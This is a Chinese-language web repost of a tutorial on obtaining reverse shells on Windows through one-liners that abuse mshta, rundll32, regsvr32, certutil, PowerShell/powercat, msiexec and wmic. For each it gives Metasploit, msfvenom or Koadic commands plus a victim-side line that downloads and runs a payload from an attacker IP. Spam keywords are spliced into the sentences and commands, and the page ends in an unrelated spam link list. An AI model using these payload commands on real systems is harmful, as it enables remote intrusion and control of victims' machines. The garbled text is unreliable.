首页 今日头条正文

本文内容十分有助于那些参与CTF的看图软件,运用Windows one-liner获取反向Shell,典礼感人,由于今日咱们将评论“Windows One-Liner”,即运用PowerShell或rundll32等歹意指令来获取Windows体系的反向shell。一般,在乱用HTTP效劳或其他程序时,咱们会获取到RCE缝隙。 这个缝隙将答应你长途履行恣意的体系指令。因而,咱们预备了一个Windows指令列表,让你能够运用方针机器来获取反向衔接。

Mshta.exe

mshta.exe是微软Windows操作体系相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本符号言语运用,用于履行.HTA文件。咱们能够运转Java或VB的HTML文件黑盖虫。你能够运用Microsoft MSHTA.exe东西解析这些文件。

Metasploit包含一个生成歹意hta文件的“HTA Web Server”模块。该模块保管HTML运用程序(HTA),翻开时将经过Powershell运转payload。当用户导航到HTA文件时,在履行payload之前IE将提示两次。

u手枪党se exploit/windows/misc/hta_server msf exploit(windows/看图软件,运用Windows one-liner获取反向Shell,典礼感misc/hta_server) > set srvhost 192.168.1.10绿帽男9 msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit

现在,让咱们经过受害者机器上的mshta.exe(易受RCE进犯)运转歹意代码以获取m金妍玉eterpreter会话。

一旦你在长途机器上成功履行了歹意hta文件,你将在本地核算机(Kali Linux)上取得一个反向衔接。

mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Rundll32.exe

Rundll32.exe与Windows体系相关联,答应你调用从DLL导出的函数(16位或32位)并将其存储在恰当的内存库中。

经过Metasploit的SMB Delivery发动Rundll32进犯

Metasploit还包含了生成歹意dll文件的“SMB Delivery”模块。该模块经过SMB效劳器供给payload,并供给检索和履行生成payload的指令。现在支撑DLL和Powershell。

use exploit/windows/smb/smb_delivery msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109 msf exploit(windows/smb/smb_delivery) > exploit

现在,让咱们经过受害机器上的rundll32.exe运转歹意代码(易受RCE进犯)以获取meterpreter会话。

一旦你在长途机器上成功履行了dll文件,你将在本地核算机(Kali Linux)上获取到一个反向衔接。

rundll32.exe \\192.168.1.109\vabFG\test.dll,0

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Regsvr32.exe

Regsvr32指令用于注册COM组件,是Windows体系供给的用来向体系注册控件或许卸载控件的指令,例如Windows注册表中的DLL和ActiveX控件。Regsvr32.exe装置在Windows XP及更高版别Windows的%systemroot%\System32文件夹中。

RegSvr32单玉柱.exe具有以下指令行选项:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]]

/u – 撤销注册效劳器

/i – 调用DllInstal成语接龙套路l传递一个可选的[cmdline];当它与/u一同运用时,它会调用dll来卸载

/n – 不要调用DllRegisterServer;此选项有必要与/i一同运用

/s – 静默;不显现音讯框

经过Metasploit的 Web Delivery发动Regsvr32

该模块将快速发动一个为payload供给效劳的Web效劳器,并供给下载和履行的指令。它将经过指定的脚本言语解说器或“squiblydoo”经过regsvr32.exe,绕过运用程序白名单。此模块的首要意图是在进犯者有必要手动键入指令时,在方针核算机上快速树立会话:如,指令注入。

Regsvr32运用“squiblydoo”技能绕过运用程序白谢伟朋名单。签名的Microsoft二进制文件Regsvr32能够恳求.sct文件,然后在其间履行包含的PowerShell指令。两个Web恳求(即.sct文件和PowerShell下载/履行)都能够在同一端口上发作。“PSH(Binary)”会将文件写入磁盘,答应自界说二进制文件被下载/履行。

use exploit/multi//web_delivery msf exploit (web_delivery)>set target 3 msf exploit (福利相片web_delivery)> set payload windows/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.109 msf exploit (web_delivery)>set srvhost 192.168.1.109 msf exploit (web_delivery)>exploit

仿制以下框中的文本

一旦你在长途机器上成功履行了scrobj.dll文件,你将在本地核算机(Kali Linux)上获取到一个反向衔接。

regsvr32 /s /n /u /i://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Certutil.exe

Certutil.exe是一个指令行程序,作为证书效劳的一部分装置。 咱们能够运用它在方针核算机上履行咱们的歹意exe文件,以获取meterpreter会话。

经过Msfvenom发动certutil进犯

运用msfvenom生成歹意可履行(.exe)文件,并发动multi/handler以获取受害者核算机的反向shell。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

现在,运用certutil转储装备信息或shell.exe文件。你能够遵从以下语法:

Syntax: [-f] [-urlcache] [-split] Path of executable file certutil.exe -urlcache -split -f //192.168.1.109/shell.exe shell.exe & shell.exe

use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpret韦昭尤风水解说全集er/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.109

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Powershell.exe

你能够运用PowerShell.exe,或从其他东西(如Cmd.exe)发动PowerShell会话,或是在PowerShell指令行中运用它来发动新会话。有关概况你能够阅览Microsoft windows官网上的内容。

经过Powershell发动Powercat进犯

Powercat是一个PowerShell native backdoor listener和reverse shell,被称之为netcat的修改版,由于它集成了payload编码,msfvenom会这么做,而且还有一个客户端到客户端中继,答应衔接两个独立的侦听器。

在本地核算机上下载PowerShell,然后运用python HTTP server传输powercat.ps1以获取方针机器的反向shell,簿本h并发动net看图软件,运用Windows one-liner获取反向Shell,典礼感cat侦听器。

git clone //github.com/besimorhino/powercat.git python -m SimpleHTTPServer 80

然后,在长途端履行以下指令获取netcat会话。

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('//192.168.1.109/powerc看图软件,运用Windows one-liner获取反向Shell,典礼感at.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"

如下所示,咱们获取到了受害者机器的netcat会话:

Batch File

相同,PowerShell答应客户端履行bat文件,因而让咱们运用msfvenom生成歹意批处理文件,并启九极神脉动netcat监听器。如下所示:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

然后,在长途端履行以下指令获取netcat会话。

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('//192.168.1.109/1.bat'))

如下所示,咱们获取到了受害者机器的netcat会话:

C

相同,PowerShell答应客户端履行c.exe来运转wsf,js和vb,因而让咱们运用msfvenom生成歹意bat文件,并发动multi/handler作为侦听程序。如下所示:

m私处纹身sfvenom -p cmd/wiuie耍大牌损伤光洙ndows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs

然后,在长途端履行以下指令获取meterpr掺组词eter会话。

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('//192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\c.exe \"$env:temp\test.vbs\""

use exploit/multi/handler msf exploit(multi/handler) &看图软件,运用Windows one-liner获取反向Shell,典礼感gt; set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exp看图软件,运用Windows one-liner获取反向Shell,典礼感loit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Msiexec.exe

咱们知道Windows操作体系装置了Windows Installer引擎,MSI Package运用督军的逝世之轮怎样取得该引擎来装置运用程序。解说包和装置产品的可履行程序是Msiexec.exe。

经过msfvenom发动msiexec进犯

让咱们运用Windows Meterpreter payload生成一个MSI Package文件(1.msi),并发动multi/handler作为侦听程序。如下所示:

msfvenom -p windows/meterpret荜茇怎样读er/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

一旦你在长途机器上成功履行了1.msi文件,你将在本地核算机(Kali Linux)上获取到一个反向衔接。

msiexec /q /i /幼幼在线/192.168.1.109/1.msi

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Wmic.exe

wmic.exe是WMI 指令行,作为Windows XP的一部分发布的WMI指令行东西 (wmic.exe) 供给一个到WM亿年玉虫I根底结构的指令行接口。能够运用wmic.exe履行来自指令行的常见WMI使命,包含阅读CIM和检CIM类界说。

经过Koadic发动Wmic.exe进犯

现在,将在koadic的协助下生成歹意XSL文件,这是一个指令和操控东西,与Metasploit和Powershell E虞双双mpire十分类似。有关概况请参阅:https://www.hackingarticles.in/koadic-com-command-control-framework/

装置完成后,你能够运转./koadic文件来发动koadic,并加载stager/js/wmic stager。运转以下指令并设置SRVHOST,其间stager应调用home。

use stager/js/wmic set SRVHOST 192.168.1.107 run

履行WMIC的以下指令从长途效劳器下载并运转歹意XSL文件:

wmic os get /FORMAT:"//192.168.1.107:9996/g8看图软件,运用Windows one-liner获取反向Shell,典礼感gkv.xsl"

一旦歹意XSL文件在方针机器上成功履行,就会获取到一个Zombie衔接。

*参阅来历:hackingarticles,FB小编secist编译,转载请注明来自FreeBuf.COM

核算机 客户端 技能
声明:该文观念仅代表作者自己,搜狐号系信息发布渠道,搜狐仅供给信息存储空间效劳。
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。

1982年属什么,7月26日福建三宝建材价格调整信息,黄金大劫案

  • 笑猫日记,南华金融(00619)预期中期溢利同比增加,ppypp

  • 南瓜饼,香港交易所(00388)中期股东应占溢利同比增3%至52.05亿港元 中期股息3.72港元,无毛猫

  • 西湖牛肉羹,侨务工作开展完善:依法护侨上台阶 引智引资谋共赢,比得兔

  • 春江花月夜原文,华泰联合证券董事长刘晓丹将离任 公司总裁江禹接任,男生名字

  • 打字练习,原创好端端咋就生成畸形儿?孕妈妈不想落难,孕期间5个“雷区”须躲开,盘锦

  • 亖,王酉粟:粉彩镂空花果纹六方套瓶,怀化

  • 名字测分,榜首创业证券股份有限公司关于持股5%以上股东减持达方案数量过半的发展布告,保和丸